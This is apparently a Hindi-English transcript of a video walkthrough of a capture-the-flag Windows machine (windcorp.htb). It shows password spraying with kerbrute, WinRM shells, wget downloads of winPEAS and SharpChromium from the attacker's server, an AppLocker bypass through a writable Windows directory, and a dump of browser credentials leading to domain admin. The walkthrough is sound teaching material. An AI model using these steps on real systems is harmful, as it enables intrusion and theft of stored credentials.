यूज़र डॉट टी एक्स टी, परफेक्ट। एंड यूज़र डॉट टी एक्स टी को मैं एक बार मूव कर लेता हूँ डब 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 डायरेक्टरी में। सो मूव यूज़र डॉट टी एक्स टी इंटू डब डब डब, परफेक्ट। एंड यहाँ से मैं इसको डाउनलोड कर लेता हूँ। सो आई डाउनलोडेड दैट फाइल। अब मैं एक बार कर्व रूट को रन करता हूँ। सो कर्व रूट, सबसे पहले मैं इसका हेल्प मेन्यू चेक करता हूँ एंड मुझे करना है पासवर्ड डिस्प्ले। सो मैं पासवर्ड डिस्प्ले के अकॉर्डिंग अपने आर्ग्यूमेंट्स को सेट करूँगा। सो कर्व रूट, देन पासवर्ड डिस्प्ले। उसके बाद मुझे डोमेन नेम को स्पेसिफाई करना होगा जो है हमारा windcorp.htb। एंड यहाँ पे आएगा यूज़र डॉट टी एक्स टी जो फाइल कंटेन करती है यूज़र नेम्स को, एंड उसके बाद हमारा पासवर्ड। एंड पासवर्ड आई गेस मैंने कॉपी नहीं किया था, कोई इशू नहीं, मैं इसको दोबारा से चेक कर लेता हूँ। कैट हैश, परफेक्ट। एंड ये हमारा पासवर्ड। तो कर्व रूट से हमें पता लगा कि ये जो पासवर्ड है ये दो अकाउंट के लिए यूज हो रहा है। वन है स्क्रिप्ट रनर एंड द सेकंड वन इज बॉब डॉट वुड। तो स्क्रिप्ट रनर वी ऑलरेडी नो, जिसकी हेल्प से जो हमारी स्क्रिप्ट को रन कर रहा था, एलडेप फॉर्म कोड जो रन कर रहा था, राइट नाउ। अब मेरे को ये देखना है कि बॉब डॉट वुड कौन सा यूज़र है। तो उसके लिए मैं अपने एलडेप डॉट टी एस टी में वापस आता हूँ एंड यहाँ पे सर्च करता हूँ बॉब डॉट वुड। सो बॉब डॉट वुड जो है वो एक एडमिन यूज़र है बट नॉट एडमिनिस्ट्रेटर आई गेस। एंड ये पार्ट है एक ओयू का जो है एडमिन अकाउंट्स की। सो नाउ लेट्स गेट द शेल फॉर बॉब डॉट वुड। सो उसके लिए मैं इस पेन को क्लोज कर देता हूँ, आई डोंट थिंक वी नीड दैट पेन। एंड यहाँ पे पाइथन सर्वर को भी मैं क्लोज कर देता हूँ। एंड सिंपल यूजिंग प्रॉक्सी चेन्स, सबसे पहले मैं इसकी टिकट के लिए इनिशिएट करता हूँ। सो के इनिट बॉब डॉट वुड, परफेक्ट। एंड लेट्स कॉपी द पासवर्ड एंड इस पासवर्ड को मैं यहाँ पे पेस्ट कर देता हूँ, परफेक्ट। अब मैं के यूजिंग के लिस्ट चेक करता हूँ कि मेरे पास कौन कौन सी टिकट्स हैं। सो वी हैव दीज टू टिकट्स, वन इज़ फॉर बॉब वुड एंड द सेकंड वन इज़ फॉर रे डनकन, राइट। सो अब मैं इसका शेल लेने के लिए यूज़ करूँगा एविल विन आर एम। तो सबसे पहले प्रॉक्सी चेन्स एविल विन आर एम एंड आई थिंक आई हैव टू यूज़ माइनस के, लेट्स सी, माइनस help and okay, I don't have to use minus k, I have to use that minus I is for IP जो है हमारा hope.windcorp.htb एंड आई गेस रियल एम फॉर डोमेन। सो जो डोमेन है हमारा windcorp.htb, perfect। and let's see, now we got the shell as bob.wood user। अब मैं इसमें सबसे पहले वापस आता हूँ यूज़र्स डायरेक्टरी में एंड चेक करता हूँ कि कौन कौन से यूज़र्स हैं। एंड लेट्स सी, ओके, सो दैट डजंट required minus LA। so we have three users, administrators bob.wood and script runner। bob.wood की permissions को चेक करता हूँ मैं, who am I all, एंड इट्स नॉट अ पार्ट ऑफ एडमिनिस्ट्रेटर ग्रुप और डोमेन एडमिन। तो यहाँ पे मैं रन करूँगा विन पीस को एंड विल सी कि उसका क्या आउटपुट आता है, राइट। सो लेट्स सी सी डी बॉब। सो नाउ तो यहाँ पे मैं डाउनलोड करता हूँ winpiece.exe को। सबसे पहले लेट मी सी कि मेरे पास winpiece.exe है या नहीं। उसके लिए मैं एक नई पेन ओपन करता हूँ क्योंकि यहाँ पे काफ़ी सारी पेन्स ऑलरेडी ओपन है। सो लेट्स सी winpiece.exe इज हियर। आई डोंट थिंक कि हमारे पास winpiece.exe है। सो लेट मी गो टू दैट yt डायरेक्टरी एंड www, या winpiece.exe इज हियर। एंड इसको मैं कॉपी कर लेता हूँ अपने दूसरे www फोल्डर में। सो yt www winpiece.exe एंड इसको मैं यहाँ पे मूव कर देता हूँ, परफेक्ट।
अब मैं एक पाइथन का वेब सर्वर क्रिएट करता हूँ एंड इसको अब मैं रन ही होने दूंगा, क्योंकि अब मेरे को इसकी ज़रूरत काफ़ी बार पड़ रही है। राइट, सो मैं वापस से आ जाता हूँ अपने शेल पे एंड यहाँ पे मैं डाउनलोड करता हूँ wget 10.10.10.14 पासवर्ड पेस्ट हो गया गलती से। लेट मी कॉपी दैट फाइल नेम, जो कि है हमारा विन पीस एनी, आई गेस, आई एम नॉट श्योर अबाउट द फाइल नेम। राइट, विन पीस एनी डॉट टी एक्स सी। सो port 8000, then winpiece any.exe and -o for output, एंड इसका सिंपल सा नाम रखता हूँ मैं win.exe एंड लेट्स सी। सो यहाँ पे रिक्वेस्ट इनिशिएट हुई है एंड सून ही ये फाइल डाउनलोड हो जाएगी एंड आई थिंक फाइल जो है वो डाउनलोड हो चुकी है। यस, अब मैं इसको रन करता हूँ। सो win.exe। Okay, so this program is blocked by your group policies. तो जैसा कि मैंने आपको पहले बताया था कि इसमें एक ऐप लॉकर चल रहा है एंड उस ऐप लॉकर को हमें बाईपास करना होगा, तभी हम इसका प्रिविलेज एस्केलेशन कर पाएंगे। एक्चुअली दो मेथड हैं इसके प्रिविलेज एस्केलेशन करने के। एक मेथड है जिसमें हमको ऐप लॉकर को बाईपास करना पड़ेगा एंड एक दूसरा मेथड है जिसमें हमको ऐप लॉकर को बाईपास नहीं करना पड़ेगा। सो इस टाइम पे हम इसका जो इंटेंडेड वे है जिसमें हमको ऐप लॉकर को बाईपास करना होगा, उसके थ्रू इस मशीन को सॉल्व करेंगे। एंड अगर आप चाहते हो कि मैं इसका दूसरा मेथड भी शो करूं तो प्लीज़ आप कमेंट कर दीजिएगा नीचे, मैं उसको भी शो कर दूंगा। तो यहाँ पे मैं सिंपल टाइप करूँगा गेट ऐप लॉकर पॉलिसी एंड इफेक्टिव XML। तो मैं XML फॉर्मेट में ऐप लॉकर पॉलिसी को गेट कर रहा हूँ एंड इसको मैं कॉपी कर देता हूँ एक फाइल में। Like this, and I only need till here. Perfect। यहाँ पे मैं एक नई पेन ओपन करता हूँ, nano app locker dot xml, not this, so perfect। अब मैं इसको फायरफॉक्स में ओपन करता हूँ। so Control O for open and HTTP segment applocker.xml। See, we have this very big file of applocker। यहाँ पे काफ़ी सारे रूल्स डिफाइन है, तो हम सिंपल जाते हैं exe सेक्शंस पे एंड exe सेक्शंस के रूल्स को चेक करते हैं। राइट, वी हैव दिस टाइप exe एंड इट इज इनेबल्ड, so we have so many rules I guess for it। एक रूल है कि हम msdt.exe को रन नहीं कर सकते, I think yes, and we have so many methods, right। msHTA.exe को रन नहीं कर सकते and is there any allow। install util को I guess हम रन कर सकते हैं, deny, we cannot run install util.exe as well, and I think we cannot run any exe in this directory। and इसको वेरीफाई करने के लिए मैं सिंपल एक वर्ड राइटेबल डायरेक्टरी में जाता हूँ, जो कि है ये। अब मैं यहाँ पे कॉपी करता हूँ अपनी winpiece.exe को। राइट, सो उसके लिए मैं जाता हूँ वापस से यूज़र्स में, देन नॉट कॉलन इज़ नॉट रिक्वायर्ड, bob.wood में। उसके बाद मैं यहाँ से कॉपी करता हूँ win.exe को एंड यहाँ पे सिंपल पेस्ट कर देता हूँ। सो लेट्स सी, win.exe इज हेयर एंड यहाँ पे मैं इसको रन करूँगा। ओके, तो अगेन वी कैन सी कि हमारी जो win.exe है वो रन नहीं हो रही है, क्योंकि ये जो डायरेक्टरी है ये डायरेक्टरी डिनाई लिस्ट में अप्रूव है। राइट, तो ये जितनी भी फाइल पास हैं यहाँ पे हम कोई भी कस्टम exe को रन नहीं कर सकते एंड आई गेस हम उन्हीं exe को रन कर सकते हैं जो कि साइंड की हो माइक्रोसॉफ्ट के द्वारा और आई गेस साइंड करी गई हो यूजिंग एडमिनिस्ट्रेटर सर्टिफिकेट। राइट, सो लेट्स सी नाउ इफ वी सी, यहाँ पे जो है एक डायरेक्टरी मिसिंग है जो है हमारी विंडोज डीबग और WIA। तो ये भी एक वर्ड राइटेबल डायरेक्टरी है
जिसमें हम अपने पेलोड्स को काफ़ी बार पुट करते हैं, राइट। एंड ये डायरेक्टरी मेरे को कैसे पता, क्योंकि मेरा जो पास्ट एक्सपीरियंस है वो रेड टीम का ही है। सो मैंने कई बार इस डायरेक्टरी को यूज़ किया है अपने अपने एंगेजमेंट्स में, राइट। सो मैं वापस से आता हूँ अपनी सी विंडोज़ देन debug WIA। और अगर आपको ये सब चीज़ें नहीं पता तो आप यहाँ पे जा सकते हैं ऐप लॉकर गिटहब bypass list, something like this. See, we have this list and we have this list, and you will find somewhere this directory in these list. Okay, so मैं वापस से अपने टर्मिनल पे आता हूँ एंड यहाँ पे मैं रन करता हूँ winpiece.exe को। सो उसके लिए मैं उसको कॉपी करता हूँ अगेन सी यूज़र से, सी यूज़र्स बॉब वुड win.exe एंड हियर। नाउ मैं इसको रन करता हूँ win.exe को, win.exe परफेक्ट। सो हमारी विन पीस जो है वो रन हो रही है, राइट। सो यहाँ पे मैं इसके आउटपुट का वेट रन नहीं करूँगा, क्योंकि इसके आउटपुट से हमको कुछ ज़्यादा मिलेगा नहीं। सो दैट्स वाई आई डोंट वांट टू वेस्ट द टाइम। तो मैं सिंपल अगेन एक सेशन क्रिएट करता हूँ। सो मेरा जो मोटिव था आपको ये सारी चीज़ दिखाने का, ये सिंपल यही था कि आप भी ऐप लॉकर के बारे में जानें एंड इसके बारे में थोड़ा और रिसर्च करें। अगर आपके मन में कोई भी डाउट रहता है कि ऐप लॉकर कैसे काम करते हैं, तो यू कैन कमेंट डाउन बिलो। सो हमारा जो इंटेंडेड पाथ है वो है हमें यहाँ से ब्राउजर्स के क्रेडेंशियल को ग्रैब करना है एंड उनकी हेल्प से अपना लास्ट प्रिविलेज एस्केलेशन स्टेप को परफॉर्म करना है। एंड यूजुअली भी जब भी मैं रेड टीम एंगेजमेंट्स में होता हूँ, सो अगर मेरे को इनिशियल फुटहोल्ड मिल जाता है और मेरे पास इतनी परमिशंस होती हैं कि मैं ब्राउजर्स की फाइल्स को चेक करूँ, तो आई ऑलवेज चेक ब्राउज़र फाइल्स, क्योंकि कई बार उसमें हमें प्लेन टेक्स्ट में पासवर्ड मिल जाते हैं, व्हाट्सएप की चैट्स की हिस्ट्री मिल जाती है। एंड एक बार तो ऐसा हुआ था कि मैंने एक पूरी प्रोफाइल इंपोर्ट कर ली थी फायरफॉक्स की, एंड उसको अपने लोकल फायरफॉक्स में जब इंपोर्ट किया उस पूरी प्रोफाइल को, सो आई कैन सी हिज ऑल पासवर्ड, राइट। जो भी उसने पासवर्ड सेव करे थे फायरफॉक्स में वो सारे मैं देख सकता था। इवन आई कैन एक्सेस देयर व्हाट्सएप चैट्स, राइट। तो ये काफ़ी एक डेंजर चीज़ है जो कि हमें रेड टीम में दिखती ही रहती है। सो इसका भी जो इंडेंडेंट पाथ है वो भी कुछ इसी तरीके का है, राइट। सो उसके लिए मैं यहाँ पे डाउनलोड करूँगा शार्प कलेक्शन की एक फाइल शार्प क्रोमियम का। सो यहाँ पे मैं सर्च करता हूँ शार्प कलेक्शन गिटहब, परफेक्ट। एंड लेट्स सी, एंड यहाँ पे मैं सर्च करता हूँ शार्प क्रोमियम डॉट exe को। सो शार्प क्रोमियम डॉट exe, perfect। and I need 4.51, so yeah, this one I need। इसको मैं यहाँ पे डाउनलोड करता हूँ एंड लेट्स वेट फॉर अ मिनट। ओके, सो हमारी जो शार्प क्रोमियम डॉट exe है वो डाउनलोड हो चुकी है। इसको मैं सिंपल मूव कर लेता हूँ अपने www डेटा डायरेक्टरी में। सो आई यूज़ मूव इंस्टेड ऑफ कॉपी, डाउनलोड शार्प क्रोमियम sharpchromium.1exe, एंड इसको मैं मूव करता हूँ अपनी www डायरेक्टरी में। एंड मैं सिंपल इसका जो नाम है वो चेंज कर देता हूँ, शार्प क्रोमियम exe को मैं कर देता हूँ sharp.exe, परफेक्ट। एंड इस फाइल को मैं डाउनलोड करता हूँ अपने डोमेन मशीन पे। तो मैं वापस से अपने WinRM सेशन पे आता हूँ एंड उस डायरेक्टरी में जाता हूँ, cd विंडोज debug WIA, एंड लेट्स सी। यहाँ पे इन दोनों फाइल्स को मैं रिमूव कर देता हूँ। सो डेल, आई थिंक इट विल वर्क, परफेक्ट। एंड यहाँ पे मैं wget से डाउनलोड करता हूँ sharp.exe को। तो 10 10 14 64 देन 8000 अगेन sharp.exe एंड आउटपुट sharp.exe, परफेक्ट। सो हमारी फाइल जो है वो डाउनलोड हो रही है। नाउ वी हैव टू डंप द क्रेडेंशियल्स। सो
अगर आप चाहते हो कि ये बाइनरी किस तरीके से वर्क करती है, ये मैं आपको डिटेल में समझाऊं, इसकी बैकग्राउंड प्रोसेसिंग, विंडोज एपीआई कॉल, सो जस्ट कमेंट डाउन बिलो, आई बी मोर हैप्पी टू एक्सप्लेन दिस। बट अगर मैं इसे इसी वीडियो में एक्सप्लेन करूंगा तो ये वीडियो काफ़ी ज़्यादा लेंदी हो जाएगा, एंड वैसे भी मेरी कोई वीडियो इतना देखता नहीं, बट दिस इज़ द मैक्स वट आई कैन डू। अनेबल टू connect to the remote server, okay, so 1467 I guess, let's see, या 1467। सो हमारी फाइल जो है वो डाउनलोड हो चुकी है, एंड लेट्स सी sharp.exe, sharp.exe। नाउ जस्ट मेरे को यहाँ पे टाइप करना है लॉगिन्स, एंड वी कैन सी द पासवर्ड्स इन प्लेन टेक्स्ट फॉर्मेट, एंड वी हैव दीज मैनी पासवर्ड्स। सो यहाँ पे मैं पासवर्ड ट्राई करूँगा बॉब वुड एडीएम का। एडीएम आई गेस स्टैंड्स फॉर एडमिनिस्ट्रेटर, एंड यूजिंग WinRM मैं इसमें भी लॉगिन करने का ट्राई करूँगा। सो प्रॉक्सी चेन्स knet, here I should need that username। तो यूज़र है हमारा बॉब वुड एडीएम, सो बॉब वुड एडीएम, एंड यहाँ पे मैं पासवर्ड को पेस्ट कर देता हूँ। परफेक्ट, एंड लेट्स सी कि हमको इसका टिकट मिलता है या नहीं, एंड आई थिंक वी सक्सेसफुली गॉट द टिकट फॉर बॉब वुड एडीएम। नाउ आई विल यूज अगेन प्रॉक्सी चेन्स, सो प्रॉक्सी chains, then I will WinRM, WinRM -i for IP, windcorp.htb, and -r for domain, windcorp.htb, and let's wait for the final shell। Perfect, we got the final shell। now मैं इसकी परमिशन देखता हूँ कि इस यूज़र्स पे क्या क्या परमिशंस हैं। हु एम आई ग्रुप्स, और हु एम आई ऑल, हु एम आई ऑल। आई थिंक माई शेल इज मेस्ड अप, हु एम आई इज नॉट recognized, so yeah, typo error is there। now when I did who am I all, and I can clearly see कि जो हमारा यूज़र है वो डोमेन एडमिन का एंड बिल्ट इन एडमिनिस्ट्रेटर का यूज़र है, राइट। सो दिस इज आवर फाइनल शेल। नाउ मैं root.txt को रीड करता हूँ, तो डेस्कटॉप root.txt, cat is not there, okay, root.txt is not here because this is not an admin user, so I have to go to administrator directory। so for that, administrator, and let's see, desktop, type root.txt। so that's the box। I hope आपको ये वीडियो पसंद आई होगी। प्लीज़ लाइक, शेयर एंड सब्सक्राइब।